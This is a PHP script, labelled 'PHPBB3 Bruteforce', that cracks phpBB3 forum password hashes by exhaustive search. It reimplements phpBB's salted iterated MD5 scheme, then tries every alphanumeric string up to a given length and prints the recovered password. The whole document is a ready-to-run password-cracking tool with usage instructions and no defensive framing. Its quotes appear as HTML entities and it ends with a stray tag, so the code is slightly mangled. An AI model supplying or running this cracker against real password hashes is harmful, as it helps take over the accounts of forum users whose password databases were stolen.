use: php script.php 'hash' chars
<?php set_time_limit(0); echo &quot;///////////////////////////////////////////////\r\n&quot;; echo &quot;// PHPBB3 Bruteforce //\r\n&quot;; echo &quot;// Original bruteforce script by Tux //\r\n&quot;; echo &quot;// Moded for Phpbb3 by Jeforce //\r\n&quot;; echo &quot;// //\r\n&quot;; echo &quot;////////////////////////////////////////////\r\n&quot;; if ($argc<2 || $argv[1]=='--help') { echo<<<END USAGE: {$argv[0]} 'hash' chars - hash : The hash to crack - chars : Max length string to attempt to crack HELP: {$argv[0]} --help END; exit; } //Fonction PHPBB3 function _hash_crypt_private($password, $setting, &$itoa64) { $output = '*'; // Check for correct hash if (substr($setting, 0, 3) != '$H$') {return $output;} $count_log2 = strpos($itoa64, $setting[3]); if ($count_log2 < 7 || $count_log2 > 30) {return $output;} $count = 1 << $count_log2; $salt = substr($setting, 4, 8); if (strlen($salt) != 8) {return $output;} $hash = pack('H*', md5($salt . $password)); do { $hash = pack('H*', md5($hash . $password)); } while (--$count); $output = substr($setting, 0, 12); $output .= _hash_encode64($hash, 16, $itoa64); return $output; } function _hash_gensalt_private($input, &$itoa64, $iteration_count_log2 = 6) { if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) {$iteration_count_log2 = 8;} $output = '$H$'; $output .= $itoa64[min($iteration_count_log2 + ((PHP_VERSION >= 5) ? 5 : 3), 30)]; $output .= _hash_encode64($input, 6, $itoa64); return $output; } /** * Encode hash */ function _hash_encode64($input, $count, &$itoa64) { $output = ''; $i = 0; do { $value = ord($input[$i++]); $output .= $itoa64[$value & 0x3f]; if ($i < $count) {$value |= ord($input[$i]) << 8;} $output .= $itoa64[($value >> 6) & 0x3f]; if ($i++ >= $count) {break;} if ($i < $count) {$value |= ord($input[$i]) << 16;} $output .= $itoa64[($value >> 12) & 0x3f]; if ($i++ >= $count) {break;} $output .= $itoa64[($value >> 18) & 0x3f]; } while ($i < $count); return $output; } function phpbb_check_hash($password, $hash) { $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; if (strlen($hash) == 34) { return (_hash_crypt_private($password, $hash, $itoa64) === $hash) ? true : false; } return (md5($password) === $hash) ? true : false; } //if(isset($argv[4])) $charset=$argv[4]; //else $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $charset_beginning = $charset{0}; $charset_end = $charset{strlen($charset)-1}; //$HASH = '$H$99i1.eNyzhGdi5/lAnKnSjU8iIABC80'; // $SIZE = (int) $_GET['chars']; $HASH = $argv[1]; $SIZE = (int) $argv[2]; $start = time()-1; $curtotal=0; $total=0; for($i=$SIZE; $i>0; $i--) $total+=pow(strlen($charset), $i); $split=ceil(($total/strlen($charset))/5); echo &quot; *** MAX SIZE: $SIZE, cracking HASH: $HASH\r\n&quot;; echo &quot; *** TOTAL KEYS: $total\r\n&quot;; echo &quot; *** CHARSET: $charset\r\n&quot;; for($i=1; $i<=$SIZE; $i++) { $keyspace = pow(strlen($charset), $i); echo &quot;\r\nAttempting to crack with $i characters.\r\n&quot;; echo &quot; *** Total combinations: $keyspace\r\n&quot;; $key = ''; for ($y=0; $y<$i; $y++) $key .= $charset_beginning; for ($x=0; $x<$keyspace+1; $x++) { $curtotal++; if (phpbb_check_hash($key, $HASH)) { $time=(time()-$start); echo<<<END Successfully key cracked after $time seconds. The cracker searched a total of $curtotal keys out of a possible $total in $time seconds. Found the clear text of '$HASH' is '$key'.\n END; exit; } if($x%$split == 0) { $rate=ceil($curtotal/(time()-$start)); echo &quot; ... $curtotal/$total ($key) [$rate Keys/second]\r\n&quot;; } for ($y=0; $y<$i; $y++) { if ($key[$y] != $charset_end) { $key[$y] = $charset{strpos($charset, $key[$y])+1}; if ($y > 0) for ($z = 0; $z < $y; $z++) $key[$z] = $charset_beginning; break; } } } } $time=time()-$start; echo<<<END *** SORRY NO MATCHS FOUND Time running : $time. Keys searched : $total.\n END; <?